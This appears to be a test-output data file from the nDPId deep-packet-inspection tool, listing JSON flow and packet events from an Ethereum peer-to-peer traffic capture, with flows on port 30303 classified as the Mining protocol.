00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":598,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365038,"flow_last_seen":1578508365038,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365038,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.230.108.42","src_port":56644,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":598,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1578508365038,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365038,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG\/kfAqAG4DeZsKt1Edl+KMGOvAAAAALAC\/\/8AAwAAAgQFtAEDAwUBAQgKItiWLQAAAAAEAgAA"}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":605,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1578508365039,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365039,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGe3mQW3iHwKgBuHZf3UEpl2emdDhi4qAScSAVuAAAAgQFrAQCCArbhaVwItiWFAEDAwc="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":606,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1578508365039,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365039,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGb4HAqAG4kFt4h91Bdl90OGLiKZdnp4AQECylVgAAAQEICiLYli7bhaVw"}
00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":607,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365009,"flow_last_seen":1578508365040,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1578508365040,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"144.91.120.135","src_port":56641,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":645,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365045,"flow_last_seen":1578508365045,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365045,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"185.219.133.62","src_port":56645,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":645,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1578508365045,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365045,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGOT7AqAG4uduFPt1Fdl+PNscoAAAAALAC\/\/\/ScwAAAgQFtAEDAwUBAQgKItiWMgAAAAAEAgAA"}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1578508365063,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365063,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACMG2uES26efwKgBuHZf3T9fy8\/Lfuf1H6ASaN8cNgAAAgQFrAQCCAoSyYNbItiVzQEDAwc="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1578508365063,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365063,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGvenAqAG4Etunn90\/dl9+5\/UfX8vPzIAQECyjNQAAAQEICiLYlkUSyYNb"}
00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":648,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364932,"flow_last_seen":1578508365065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":521,"flow_tot_l4_payload_len":521,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1578508365065,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":56639,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":649,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1578508365065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365065,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGx0OyPgrawKgBuHZf3UIGbP5HMVZ5eqAScSDZAAAAAgQFrAQCCAoLgra+ItiWHgEDAwc="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":650,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1578508365065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365065,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGu0vAqAG4sj4K2t1Cdl8xVnl6Bmz+SIAQECxokQAAAQEICiLYlkYLgra+"}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":651,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1578508365065,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1578508365065,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHKIQAAEAR+iHAqAG4QipS9nZfdl8As8h52l5Lj\/FNPSwNskN7KXHg69sINFX5NaCleeEwgXwmONn61xupKUye1QOfHD1DMyDw8Rv4bxSGME4AJ9XC7q+0Pwz+NqNAUtNYGL1TDF+F5wROIhyoide5OcgIFnuRD6baAQP4R7hAggEUSZWpWZm0YK3HCqZiBR7sHJ3wp8USPzyX73HGoWVqts4UjRd8TfDxZuCIPe7jI\/CXMWJB7l7pTCCyfJvg8YReFiBh"}
00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":652,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365021,"flow_last_seen":1578508365066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":415,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1578508365066,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.10.218","src_port":56642,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":671,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1578508365074,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365074,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGtGayPh23wKgBuHZf3UMO43zOltsrhKAScSBk2gAAAgQFrAQCCArDycEqItiWJgEDAwc="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":672,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1578508365074,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365074,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGqG7AqAG4sj4dt91Ddl+W2yuEDuN8z4AQECz0awAAAQEICiLYlk3DycEq"}
00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":673,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365029,"flow_last_seen":1578508365075,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":469,"flow_tot_l4_payload_len":469,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":1578508365075,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.29.183","src_port":56643,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":700,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365079,"flow_last_seen":1578508365079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365079,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"172.105.94.62","src_port":56646,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":700,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1578508365079,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365079,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGbbDAqAG4rGlePt1Gdl8dOmrnAAAAALAC\/\/\/VAwAAAgQFtAEDAwUBAQgKItiWUQAAAAAEAgAA"}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":702,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1578508365092,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365092,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEGSEK524U+wKgBuHZf3UWdKkNsjzbHKaASbCBIRwAAAgQFdAQCCAp\/mc8NItiWMgEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":703,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1578508365092,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365092,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGOUrAqAG4uduFPt1Fdl+PNscpnSpDbYAQEAzSvAAAAQEICiLYll1\/mc8N"}
00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":718,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365045,"flow_last_seen":1578508365094,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":410,"flow_tot_l4_payload_len":410,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1578508365094,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"185.219.133.62","src_port":56645,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":728,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365094,"flow_last_seen":1578508365094,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365094,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"182.162.161.61","src_port":56647,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":728,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1578508365094,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365094,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGIHjAqAG4tqKhPd1Hdl8HffxGAAAAALAC\/\/8MGQAAAgQFtAEDAwUBAQgKItiWYAAAAAAEAgAA"}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":755,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1578508365104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365104,"pkt":"KDc3AG3IEBMx8Tl2CABFCAA8AABAADMGeqysaV4+wKgBuHZf3UajVVX7HTpq6KAS\/ojIGAAAAgQFrAQCCAobAQsKItiWUQEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":756,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1578508365104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365104,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGbbzAqAG4rGlePt1Gdl8dOmroo1VV\/IAQECzlIgAAAQEICiLYlmgbAQsK"}
00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":757,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365079,"flow_last_seen":1578508365105,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":474,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1578508365105,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"172.105.94.62","src_port":56646,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":900,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365153,"flow_last_seen":1578508365153,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365153,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.250.140","src_port":56650,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":900,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1578508365153,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365153,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGWefAqAG4I+T6jN1Kdl95PEStAAAAALAC\/\/+LMAAAAgQFtAEDAwUBAQgKItiWjwAAAAAEAgAA"}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":904,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365154,"flow_last_seen":1578508365154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365154,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.201.12.87","src_port":56651,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":904,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1578508365154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365154,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG4TfAqAG4iskMV91Ldl\/HR3E5AAAAALAC\/\/+X6AAAAgQFtAEDAwUBAQgKItiWjwAAAAAEAgAA"}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":924,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365169,"flow_last_seen":1578508365169,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365169,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"176.9.136.209","src_port":56652,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":924,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1578508365169,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365169,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGP33AqAG4sAmI0d1Mdl8ouUvbAAAAALAC\/\/+6CgAAAgQFtAEDAwUBAQgKItiWngAAAAAEAgAA"}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":928,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1578508365186,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365186,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIG7zuKyQxXwKgBuHZf3Uu6UG6Lx0dxOqAScSDP1QAAAgQFrAQCCAq1b4mgItiWjwEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":929,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1578508365186,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365186,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG4UPAqAG4iskMV91Ldl\/HR3E6ulBujIAQECxfbwAAAQEICiLYlq61b4mg"}
00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":932,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365154,"flow_last_seen":1578508365187,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":417,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1578508365187,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.201.12.87","src_port":56651,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":954,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365189,"flow_last_seen":1578508365189,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365189,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"85.214.108.52","src_port":56654,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":954,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1578508365189,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365189,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGtk3AqAG4VdZsNN1Odl+\/h8KiAAAAALAC\/\/8jMQAAAgQFtAEDAwUBAQgKItiWsAAAAAAEAgAA"}
00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":652,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365021,"flow_last_seen":1578508365066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":415,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1578508365066,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.10.218","src_port":56642,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":671,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1578508365074,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365074,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGtGayPh23wKgBuHZf3UMO43zOltsrhKAScSBk2gAAAgQFrAQCCArDycEqItiWJgEDAwc="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":672,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1578508365074,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365074,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGqG7AqAG4sj4dt91Ddl+W2yuEDuN8z4AQECz0awAAAQEICiLYlk3DycEq"}
00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":673,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365029,"flow_last_seen":1578508365075,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":469,"flow_tot_l4_payload_len":469,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":1578508365075,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.29.183","src_port":56643,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":700,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365079,"flow_last_seen":1578508365079,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365079,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"172.105.94.62","src_port":56646,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":700,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1578508365079,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365079,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGbbDAqAG4rGlePt1Gdl8dOmrnAAAAALAC\/\/\/VAwAAAgQFtAEDAwUBAQgKItiWUQAAAAAEAgAA"}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":702,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1578508365092,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365092,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEGSEK524U+wKgBuHZf3UWdKkNsjzbHKaASbCBIRwAAAgQFdAQCCAp\/mc8NItiWMgEDAwc="}
